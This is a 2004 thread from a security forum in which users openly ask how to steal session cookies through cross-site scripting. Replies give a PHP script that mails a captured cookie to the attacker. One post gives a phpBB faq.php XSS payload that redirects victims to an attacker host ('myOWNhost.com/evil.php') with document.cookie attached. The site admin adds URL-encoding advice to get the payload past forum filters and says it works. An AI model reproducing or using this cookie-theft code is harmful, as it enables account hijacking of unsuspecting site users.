|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 67
Members: 0
Total: 67
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
cookie stealing |
|
Posted: Wed Jul 14, 2004 3:47 pm |
|
|
migo79 |
Regular user |
|
|
Joined: May 18, 2004 |
Posts: 17 |
|
|
|
|
|
|
|
hello guys
can you waraxe give a tutorial on how send a cookie file to a form and then to be mailed to anyone
i mean by discovering a cross site scripting vuln in any script
how can i write the code to mail the cookie to me for example
any clue or other detailed tutorial is appreciated
best regards
migo |
|
|
|
|
|
Re: cookie stealing |
|
Posted: Wed Jul 14, 2004 3:57 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
ok. let's assume you got a hole in www.example.com/script.php?foo=bar
first you must send cookie to script, it goes something like this:
in evilscript.php there should be something like this:
Code: |
<?php
$cookie = $_GET['cookie'];
mail('youremail@example.com', 'You just stole a cookie', $cookie);
?>
|
nb! i may have mistakes in script(s) cause i wrote them on spot. |
|
|
|
|
Posted: Thu Jul 15, 2004 11:18 am |
|
|
migo79 |
Regular user |
|
|
Joined: May 18, 2004 |
Posts: 17 |
|
|
|
|
|
|
|
that's a well clarified reply
thanks too much |
|
|
|
|
Posted: Thu Jul 15, 2004 11:20 am |
|
|
migo79 |
Regular user |
|
|
Joined: May 18, 2004 |
Posts: 17 |
|
|
|
|
|
|
|
|
|
|
|
|
XSS |
|
Posted: Sat Jul 17, 2004 4:48 pm |
|
|
zerocool |
Regular user |
|
|
Joined: Jul 17, 2004 |
Posts: 20 |
|
|
|
|
|
|
|
is there is anyone to send the cookies to my email without to open a
PHP HOMEPAGE witn PHP "EVI SCRIPT.php"
Because i dont know from where i cant open a personal free website that support PHP SCRIPTS
so if there is any easy ways please tell me
and if anyone know some homepage that i can build my free homepage that support php scripts please tell me
thanks |
|
|
|
|
|
Re: XSS |
|
Posted: Sat Jul 17, 2004 9:18 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
zerocool wrote: | is there is anyone to send the cookies to my email without to open a
PHP HOMEPAGE witn PHP "EVI SCRIPT.php"
Because i dont know from where i cant open a personal free website that support PHP SCRIPTS
so if there is any easy ways please tell me
and if anyone know some homepage that i can build my free homepage that support php scripts please tell me
thanks |
Check Free web host
http://www.waraxe.us/forum/viewtopic.php?t=143 |
|
|
|
|
|
Re: cookie stealing |
|
Posted: Sun Sep 05, 2004 4:17 am |
|
|
dotcomBOT |
Regular user |
|
|
Joined: Jun 11, 2004 |
Posts: 12 |
|
|
|
|
|
|
|
Heintz wrote: | ok. let's assume you got a hole in www.example.com/script.php?foo=bar
first you must send cookie to script, it goes something like this:
in evilscript.php there should be something like this:
Code: |
<?php
$cookie = $_GET['cookie'];
mail('youremail@example.com', 'You just stole a cookie', $cookie);
?>
|
nb! i may have mistakes in script(s) cause i wrote them on spot. |
i got a little prob
the hole i wanna use is :
Code: |
faq.php?
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe
|
so my link should be
Code: |
[url=www.target-site.com/forum/faq.php?faq[0][0]=f00<script>document.location= 'www.myOWNhost.com/evil.php?cookie=' + window.document.cookie; </script>bar&faq[0][1]=waraxe]Click Here[/url]
|
html has been disabled over the forum [ over most of the forums ]
so the links get broken when it reaches "]"
any solution? |
|
|
|
|
|
|
|
|
Posted: Mon Sep 06, 2004 8:47 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Use urlencoded values, so "[" will be "%5b" and "]" is "%5d".
Exploit will be then something like "faq.php?faq%5b0%5d%5b0%5d=".
I tested this method on my local computer's phpbb installation, and
it works 100%. |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|